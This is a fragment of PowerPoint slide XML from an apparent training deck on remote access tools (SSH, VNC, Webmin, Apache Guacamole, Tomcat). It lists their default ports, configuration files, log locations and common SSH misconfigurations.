                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Connector </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“8009” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“AJP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/1.3” redirectPort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“8443” /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1984299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SSH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Logs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/log/auth.log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PAM authentication may bypass certain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> settings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Common configuration mistakes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Allowing root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> login</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Enabling strong authentication without disabling weaker ones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Virtual Network Computing (VNC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>VNCviewer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (client) / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>VNCServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> relationship</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Default port starting at 5900 / 5901</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Configuration located in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier Std" panose="02070409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xstartup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in users home directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Remote Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5411468" y="3090389"/>
            <a:ext cx="6372862" cy="498631"/>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rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –v 192.168.0.95 –o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PreferredAuthentications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18854241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err="1" smtClean="0"/>
              <a:t>Webmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – browser-based remote access </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Default port 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Logs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier Std" panose="02070409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier Std" panose="02070409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier Std" panose="02070409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier Std" panose="02070409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>webmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier Std" panose="02070409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/miniserv.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier Std" panose="02070409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier Std" panose="02070409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier Std" panose="02070409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier Std" panose="02070409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>webmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier Std" panose="02070409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/webmin.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier Std" panose="02070409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier Std" panose="02070409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier Std" panose="02070409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier Std" panose="02070409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/log/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier Std" panose="02070409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>webmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier Std" panose="02070409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Raw logs not easy to understand (log_parser.pl converts logs into readable message)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remote Access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2669" y="3838125"/>
            <a:ext cx="5953709" cy="2715788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31047312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7999" y="1595441"/>
            <a:ext cx="7843302" cy="4795837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Guacamole Apache – browser-based remote access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>GUACAMOLE_HOME: Primary search location for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>configs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Guacamole.properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, main </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Servlet container will have logs (i.e., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier Std" panose="02070409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>catalina.out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Below is catalina.sh startup script specifying log location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remote Access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1301" y="1501527"/>
            <a:ext cx="3657788" cy="4889751"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="370838" y="3993359"/>
            <a:ext cx="7843302" cy="2397919"/>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rPr>
              <a:t>#!/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>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rPr>
              <a:t>[…]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l"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rPr>
              <a:t>#    CATALINA_OUT    (Optional) Full path to a file where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stderr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>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rPr>
              <a:t>#                                   will be redirected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l"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rPr>
              <a:t>#                                   Default is $CATALINA_BASE/logs/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>catalina.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>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rPr>
              <a:t>[…]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  CATALINA_OUT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“$CATALINA_BASE”/logs/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>catalina.out</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27099862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7999" y="1595441"/>
            <a:ext cx="7843302" cy="4795837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Guacamole Apache – browser-based remote access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GUACAMOLE_HOME: Primary search location for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>configs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Guacamole.properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, main </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Servlet container will have logs (i.e., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier Std" panose="02070409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>catalina.out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Below is catalina.sh startup script specifying log location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remote Access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1301" y="1501527"/>
            <a:ext cx="3657788" cy="4889751"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="370838" y="3993359"/>
            <a:ext cx="7843302" cy="2397919"/>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rPr>
              <a:t>#!/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>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rPr>
              <a:t>[…]</a:t>
            </a:r>
          </a:p>
